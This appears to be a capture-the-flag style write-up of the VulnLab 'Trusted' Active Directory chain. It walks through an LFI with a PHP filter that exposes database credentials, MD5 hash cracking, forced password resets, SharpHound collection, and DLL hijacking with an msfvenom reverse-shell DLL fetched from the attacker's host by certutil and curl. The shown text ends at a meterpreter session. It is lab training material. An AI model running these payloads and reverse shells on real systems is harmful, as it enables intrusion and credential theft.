POSTS

VULNLAB: Trusted

Trusted is an Easy small Active Directory chain involving two domain controllers (labdc.lab.trusted.vl and trusteddc.trusted.vl) that focuses on web vulnerabilities, local privilege escalation, and cross-domain trust abuse. An internal network access is provided with no credentials, and the goal is to assess the security posture of the AD environment.

VULNLAB: Trusted
7056 words · 34 min

Overview

  • Type Chains
  • OS Windows
  • Severity Easy
  • Creator r0BIT
  • Release date 2022 Sep 20
  • IP 10.10.140.69, 10.10.140.70

Enumeration

Start the instance via Discord and let’s go:

image

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.140.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 11:49 JST
Nmap scan report for 10.10.140.69
Host is up (0.24s latency).
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-03 02:50:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-10-03T02:51:21+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-10-03T02:51:12+00:00
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Not valid before: 2024-10-02T02:46:19
|_Not valid after:  2025-04-03T02:46:19
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
59653/tcp open  msrpc         Microsoft Windows RPC
64498/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows
  • add trusteddc.trusted.vl, trusted.vl in /etc/hosts
$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.140.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 11:49 JST
Nmap scan report for 10.10.140.70
Host is up (0.24s latency).
Not shown: 65506 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.140.70/dashboard/
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-03 02:50:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.140.70/dashboard/
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3306/tcp  open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 10
|   Capabilities flags: 63486
|   Some Capabilities: ConnectWithDatabase, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, Speaks41ProtocolOld, ODBCClient, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsLoadDataLocal, IgnoreSigpipes, InteractiveClient, Support41Auth, LongColumnFlag, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: %RMlYX/"Wtbku*ka#*Fd
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-10-03T02:51:22+00:00
|_ssl-date: 2024-10-03T02:51:28+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2024-10-02T02:46:21
|_Not valid after:  2025-04-03T02:46:21
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
50823/tcp open  msrpc         Microsoft Windows RPC
55515/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2024-10-03T02:51:21
|_  start_date: N/A
  • add labdc.lab.trusted.vl, lab.trusted.vl in /etc/hosts

Found 2 Domain Controllers:

  • trusteddc.trusted.vl
  • labdc.lab.trusted.vl

Both have DNS, LDAP, SMB, KERBEROS, RDP and WINRM open The 2nd has also HTTP/HTTPS and MARIADB open.

WEB (80/tcp, 443/tcp)

We have a default XAMPP page:

image

image

For HTTPS we can note that certificate is for localhost

Gobuster - Directory discovery

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u http://10.10.140.70 -b 302,404,412
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.140.70
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes:   412,302,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 301]
/.htm                 (Status: 403) [Size: 301]
/img                  (Status: 301) [Size: 334] [--> http://10.10.140.70/img/]
/dev                  (Status: 301) [Size: 334] [--> http://10.10.140.70/dev/]
/webalizer            (Status: 403) [Size: 301]
/phpmyadmin           (Status: 403) [Size: 301]
/.htaccess            (Status: 403) [Size: 301]
/examples             (Status: 503) [Size: 401]
/dashboard            (Status: 301) [Size: 340] [--> http://10.10.140.70/dashboard/]
/.htc                 (Status: 403) [Size: 301]
/IMG                  (Status: 301) [Size: 334] [--> http://10.10.140.70/IMG/]
/Img                  (Status: 301) [Size: 334] [--> http://10.10.140.70/Img/]
...

Found something interesing about /img and /dev:

image

image

At the bottom of /dev page, we have something interesting as a hint:

image

In the home page we can see that the index.htlm has a paramter ?view=index.html:

image

Same with the contact page: http://10.10.227.150/dev/index.html?view=contact.html

Since we have a ?view= parameter, there’s an opportunity to exploit LFI.

LFI fuzzing

$ wfuzz -u "http://lab.trusted.vl/dev/index.html?view=FUZZ.php" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt --hw 89
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://lab.trusted.vl/dev/index.html?view=FUZZ.php
Total requests: 38267

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                    
=====================================================================

000000159:   200        30 L     55 W       763 Ch      "db"                                                                                       
000000234:   200        31 L     75 W       892 Ch      "system"                                                                                   
000000802:   200        30 L     54 W       741 Ch      "pear"                                                                                     
000002136:   200        37 L     98 W       1185 Ch     "table"
...

Check and confirm we can access to http://lab.trusted.vl/dev/index.html?view=db.php

image

Now to confirmed that LFI works, we can try Local File Inclusion (LFI) to see if any of the local files get included.

As our target is a Windows device then we try to get C:/WINDOWS/System32/drivers/etc/hosts

image

LFI confirmed

Now we try to exploit it to get the content of db.php (as contains credentials).

PHP Filter bypassing

Our way is as below:

  1. Use the view parameter to start the LFI statement.
  2. Use a PHP filter to convert all contents that we dump to base64.
  3. Using the parameter resource to say that we want to dump all contents of db.php to base64.
  4. Decode the base64 to get the clear data.

image

$ curl -s "http://lab.trusted.vl/dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php"            

<!DOCTYPE HTML>
<!-- Website template by freewebsitetemplates.com -->
<html>
<head>
	<meta charset="UTF-8">
	<title>Law Firm</title>
	<link rel="stylesheet" href="css/style.css" type="text/css">
</head>
<body>
	<div id="header">
		<div class="clearfix">
			<div class="logo">
				<a href="index.html?view=index.html"><img src="images/logo.png" alt="LOGO" height="52" width="362"></a>
			</div>
			<ul class="navigation">
				<li class="active">
					<a href="index.html?view=index.html">Home</a>
				</li>
				<li>
					<a href="index.html?view=about.html">About</a>
				</li>
				</li>
				<li>
					<a href="index.html?view=contact.html">Contact</a>
				</li>
			</ul>
		</div>
	</div>
<p>PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=</p></body>
</html>
$ echo -n 'PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=' | base64 -d
<?php 
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>     

Found MariaDB credentials root:SuperSecureMySQLPassw0rd1337.

MariaDB enumerating

As we need a break then we start a new instance and update our /etc/hosts accordingly:

image

We authenticate to MariaDB using the credentials as we saw before with nmap that 3306/tcp is open:

$ mysql -h lab.trusted.vl -u root -pSuperSecureMySQLPassw0rd1337. --skip_ssl
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 10
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
Tip
  • Don’t forget to use the parameter --skip_ssl else you have the error ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
  • Since MariaDB Version 10.10.1 the MariaDB command line client requires a secure connection and enables the --ssl option by default. See also MDEV-27105

We found the database news then enumerate the content of the table users then grab some hashed passwords:

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| news               |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
6 rows in set (0.275 sec)

MariaDB [(none)]> use news;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> show tables;
+----------------+
| Tables_in_news |
+----------------+
| users          |
+----------------+
1 row in set (0.255 sec)

MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.269 sec)

MariaDB [news]> quit;
Bye

Hash cracking (rsmith)

We have many ways to crack them to retrieve the password:

  1. More faster with https://crackstation.net/:

image

Found rsmith:IHateEric2

  1. With Hashcat:
$ hashcat -a 0 -m 0 '7e7abb54bbef42f0fbfa3007b368def7' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-skylake-avx512-AMD Ryzen 9 8945HS w/ Radeon 780M Graphics, 2899/5863 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

7e7abb54bbef42f0fbfa3007b368def7:IHateEric2               
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 7e7abb54bbef42f0fbfa3007b368def7
Time.Started.....: Sat Oct  5 10:30:30 2024 (3 secs)
Time.Estimated...: Sat Oct  5 10:30:33 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4656.5 kH/s (0.10ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11094016/14344385 (77.34%)
Rejected.........: 0/11094016 (0.00%)
Restore.Point....: 11091968/14344385 (77.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ILDICK2 -> ICEMINTS!
Hardware.Mon.#1..: Util: 41%

Started: Sat Oct  5 10:30:20 2024
Stopped: Sat Oct  5 10:30:34 2024
  1. With John The Ripper:
$ john rsmith.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
IHateEric2       (?)     
1g 0:00:00:00 DONE (2024-10-05 10:33) 3.448g/s 38251Kp/s 38251Kc/s 38251KC/s IHav.One*Q..IE99Y2
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

To identify the Hash type, we use Hash-identifier:

$ hash-identifier 7e7abb54bbef42f0fbfa3007b368def7                                     
/usr/share/hash-identifier/hash-id.py:13: SyntaxWarning: invalid escape sequence '\ '
  logo='''   #########################################################################
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Check if the credentials work:

$ nxc smb lab.trusted.vl -u 'rsmith' -p 'IHateEric2' 
SMB         10.10.137.70    445    LABDC            [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB         10.10.137.70    445    LABDC            [+] lab.trusted.vl\rsmith:IHateEric2

Confirmed

AD enumerating

Get BloodHound collections to ingest and analyze them:

$ nxc ldap lab.trusted.vl -u 'rsmith' -p 'IHateEric2' --bloodhound --dns-server 10.10.137.70 --collection All
SMB         10.10.137.70    445    LABDC            [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
LDAP        10.10.137.70    389    LABDC            [+] lab.trusted.vl\rsmith:IHateEric2 
LDAP        10.10.137.70    389    LABDC            Resolved collection methods: psremote, trusts, session, localadmin, group, acl, dcom, rdp, container, objectprops
[10:54:42] ERROR    Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains               domain.py:91
LDAP        10.10.137.70    389    LABDC            Done in 00M 49S
LDAP        10.10.137.70    389    LABDC            Compressing output into /home/user/.nxc/logs/LABDC_10.10.137.70_2024-10-05_105428_bloodhound.zip

RSMITH has ForceChangePassword to EWALTERS, that means the user RSMITH@LAB.TRUSTED.VL has the capability to change the user EWALTERS@LAB.TRUSTED.VL’s password without knowing that user’s current password:

image

EWALTERS is a member of REMOTE DESKTOP USERS and REMOTE MANAGEMENT USERS so he can access WMI resources over management protocols and access to servers via RDP:

image

ForceChangePassword abusing (ewalters)

To reset the ewalters’s password with this outbound object control, we use BloodyAD (rpcclient is also a solution):

$ bloodyAD --host lab.trusted.vl -d lab.trusted.vl -u 'rsmith' -p 'IHateEric2' set password 'ewalters' 'Azerty1234!'  
[+] Password changed successfully!

Connect to the LABDC via WinRM and try to get the Trusted_User flag:

$ evil-winrm -i lab.trusted.vl -u ewalters -p 'Azerty1234!'  
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ewalters\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\ewalters\Desktop> dir


    Directory: C:\Users\ewalters\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/21/2016   3:36 PM            527 EC2 Feedback.website
-a----         6/21/2016   3:36 PM            554 EC2 Microsoft Windows Guide.website
-a----         9/18/2022   9:12 PM         202492 robitcat.jpg
-a----         9/18/2022   9:11 PM            108 User.txt


*Evil-WinRM* PS C:\Users\ewalters\Desktop> type User.txt
|\---/|
| o_o |
 \_^_/
These are not the flags you're looking for.
Take :robitcat: as compensation :).

Upload SharpHound to be able to have a full collection:

*Evil-WinRM* PS C:\programdata> curl http://10.8.2.19/SharpHound.exe -o SH.exe

But we are restricted by GPO:

*Evil-WinRM* PS C:\programdata> .\SH.exe
Program 'SH.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1

So move to another folder and ok to launch it to grab the output in C:\Windows\Tasks:

*Evil-WinRM* PS C:\Windows\Temp> copy C:\programdata\SH.ps1 .
*Evil-WinRM* PS C:\Windows\Temp> .\SH.exe --OutputDirectory C:\Windows\Tasks\
2024-10-05T02:26:49.1763976+00:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
...
2024-10-05T02:26:58.1458748+00:00|INFORMATION|Status: 298 objects finished (+298 37.25)/s -- Using 41 MB RAM
2024-10-05T02:26:58.1458748+00:00|INFORMATION|Enumeration finished in 00:00:08.3177112
2024-10-05T02:26:58.2709181+00:00|INFORMATION|Saving cache with stats: 13 ID to type mappings.
 0 name to SID mappings.
 1 machine sid mappings.
 5 sid to domain mappings.
 0 global catalog mappings.
2024-10-05T02:26:58.3177385+00:00|INFORMATION|SharpHound Enumeration Completed at 2:26 AM on 10/5/2024! Happy Graphing!


    Directory: C:\Windows\Tasks


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         10/5/2024   2:34 AM          24993 20241005023450_BloodHound.zip
-a----         10/5/2024   2:34 AM           1297 YmQwZjhmNjEtNmZkYS00NGZmLWFhMDUtZmQ5ZTgzZjNjZWVj.bin

Then download it and ingest to BloodHound CE.

We have a clear visibility on the attack path:

image

So we need to take over CPOWERS to pwn the LABDC:

image

We can see also a bidirectional trusted relationship between 2 domains (seems also an attack path if we take account of the name of this chain Trusted):

image

  • The domain LAB.TRUSTED.VL is trusted by the domain TRUSTED.VL
  • The domain TRUSTED.VL is trusted by the domain LAB.TRUSTED.VL

ProcMon Executable reverse engineering

After more enumeration on the LABDC, we found an AVTest folder in the C:\ containing KasperskyRemovalTool.exe, so we set an impacket smbserver to download it to our attacker machine to be able to anayse it:

Local:

$ impacket-smbserver -smb2support share . -user qwerty -pass azerty
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Remote:

*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         9/14/2022   7:03 PM                AVTest
d-----         8/19/2021   6:24 AM                EFI
d-----          5/8/2021   8:20 AM                PerfLogs
d-r---         9/19/2022   3:46 PM                Program Files
d-----         8/10/2022   4:06 AM                Program Files (x86)
d-r---         9/18/2022   9:07 PM                Users
d-----         5/27/2023   4:12 PM                Windows
d-----         9/14/2022   6:07 PM                xampp


*Evil-WinRM* PS C:\> cd AVTest
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         9/14/2022   7:05 PM            235 readme.txt

*Evil-WinRM* PS C:\AVTest> type readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.
*Evil-WinRM* PS C:\AVTest> net use Z: \\10.8.2.19\share /user:qwerty azerty
The command completed successfully.
*Evil-WinRM* PS C:\AVTest> copy KasperskyRemovalTool.exe Z:\KasperskyRemovalTool.exe

I start using Ghidra and Binary Ninja to analyse it but nothing interesting has been found.

Then, What about the DLLs that are loaded while the file is running? Could these potentially be exploited?

I decided to use ProcMon for this, as we can look specifically at the DLLs that are being ran after we execute the file and while it is running.

So I transfer the file to a Windows 11 VM to examine it with ProcMon.

Launch ProcMon:

image

Running KasperskyRemovalTool.exe:

image

Hit ctrl+E to stop capturing for system events and apply filters to only display kaspersky process:

  1. Apply the filter for KasperskyRemovalTool process name
  2. Add the filter for the dll files
  3. Add the filter for dlls which are not found

image

Found an interesting DLL KasperskyRemovalToolENU.dll

We will use this finding to proceed to DLL Hijacking.

DLL hijacking (cpowers) (Trusted_User)

DLL Hijacking is a Windows application vulnerability that essentially allows an attacker to load malicious DLLs into a process in place of regular DLLs.

This can occur in the situation in front of us - when a binary uses DLLs that are located within a modifiable directory that we have access to.

By replacing a normal DLL that is used, we can trick the Windows API into running our malicious DLL.

We use MSF to create our malicious DLL:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.19 LPORT=443 -f dll -o KasperskyRemovalToolENU.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: KasperskyRemovalToolENU.dll

We set our Metasploit listener:

$ msfconsole -qx "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set LHOST tun0; set LPORT 443; set ExitOnSession false; exploit -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/shell_reverse_tcp
LHOST => tun0
LPORT => 443
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.8.2.19:443 
msf6 exploit(multi/handler) > 

We set a local webserver:

 python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

We upload ou DLL to the target:

*Evil-WinRM* PS C:\AVTest> certutil.exe -urlcache -f http://10.8.2.19/KasperskyRemovalToolENU.dll KasperskyRemovalToolENU.dll

OR

*Evil-WinRM* PS C:\AVTest> curl http://10.8.2.19/KasperskyRemovalToolENU.dll -o KasperskyRemovalToolENU.dll

OR

*Evil-WinRM* PS C:\AVTest> Invoke-WebRequest -URI http://10.8.2.19/KasperskyRemovalToolENU.dll -OutFile KasperskyRemovalToolENU.dll
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         10/5/2024   3:42 AM           9216 KasperskyRemovalToolENU.dll
-a----         9/14/2022   7:05 PM            235 readme.txt

After a few seconds of waiting, we spawn a reverse shell as cpowers:

msf6 exploit(multi/handler) > [*] Command shell session 1 opened (10.8.2.19:443 -> 10.10.137.70:52338) at 2024-10-05 12:43:07 +0900

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type               Information                                                     Connection
  --  ----  ----               -----------                                                     ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.20348.887] -----  10.8.2.19:443 -> 10.10.137.70:52338 (10.10.137.70)

We upgrade it to a full meterpreter shell:

msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.2.19:4433 
msf6 exploit(multi/handler) > 
[*] Sending stage (201798 bytes) to 10.10.137.70
[*] Meterpreter session 2 opened (10.8.2.19:4433 -> 10.10.137.70:52423) at 2024-10-05 12:46:09 +0900
[*] Stopping exploit/multi/handler

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                                     Connection
  --  ----  ----                     -----------                                                     ----------
  1         shell x86/windows        Shell Banner: Microsoft Windows [Version 10.0.20348.887] -----  10.8.2.19:443 -> 10.10.137.70:52338 (10.10.137.70)
  2         meterpreter x64/windows  LAB\cpowers @ LABDC                                             10.8.2.19:4433 -> 10.10.137.70:52423 (10.10.137.70)

msf6 exploit(multi/handler) > sessions 2
